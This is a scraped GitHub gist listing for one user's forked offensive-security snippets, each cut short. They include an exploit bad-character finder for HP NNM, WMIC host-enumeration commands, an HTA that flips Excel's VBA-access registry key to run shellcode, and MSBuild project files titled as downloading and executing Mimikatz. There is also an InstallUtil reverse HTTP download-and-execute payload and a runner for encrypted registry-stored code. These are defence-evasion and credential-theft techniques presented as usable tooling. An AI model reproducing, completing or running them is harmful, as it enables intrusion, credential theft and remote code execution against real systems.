Skip to content

Instantly share code, notes, and snippets.

Daniel Teixeira DanielRTeixeira

Block or report user

Report or block DanielRTeixeira

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@DanielRTeixeira
DanielRTeixeira / badchars.py
Created Oct 31, 2018 — forked from GeoffreyVDB/badchars.py
Find bad characters in HP NNM 7.51 with winappdbg
View badchars.py
from winappdbg import *
import os, sys, socket, time, threading
## Global Vars
allchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
@DanielRTeixeira
DanielRTeixeira / wmic_cmds.txt
Created Jul 14, 2018 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
View wmic_cmds.txt
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@DanielRTeixeira
DanielRTeixeira / CalcExcel.hta
Created Nov 2, 2017 — forked from nicholasmckinney/CalcExcel.hta
Shellcode Execution Via HTA
View CalcExcel.hta
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created Nov 2, 2017 — forked from nicholasmckinney/katz.xml
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@DanielRTeixeira
DanielRTeixeira / katz.xml
Created Nov 2, 2017 — forked from nicholasmckinney/katz.xml
MSBuild - Mimikatz - Server 2016
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
View RemoteDLLGuest.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
@DanielRTeixeira
DanielRTeixeira / rev_http.cs
Created Nov 2, 2017 — forked from nicholasmckinney/rev_http.cs
InstallUtil - Download And Execute Reverse_HTTP Payload
View rev_http.cs
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs
@DanielRTeixeira
DanielRTeixeira / RegRunner.cs
Created Nov 2, 2017 — forked from nicholasmckinney/RegRunner.cs
Executes Encrypted File From Registry
View RegRunner.cs
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
View PacHost.ps1
function Start-PACFileHosting()
{
# Example PAC File Hosting
# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
# example: http://localhost:8083/i.pac
# Be Certain Line 19 matches your Interceptor Config
Start-Job -ScriptBlock {
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8083/")
@DanielRTeixeira
DanielRTeixeira / web.config
Created Nov 2, 2017 — forked from nicholasmckinney/web.config
Encrypt Random Shit with aspnet_regiis.exe
View web.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx -->
<!-- Example by @subTee -->
<connectionStrings>
<add name="constr" connectionString="blah" />
</connectionStrings>
<system.web>
You can’t perform that action at this time.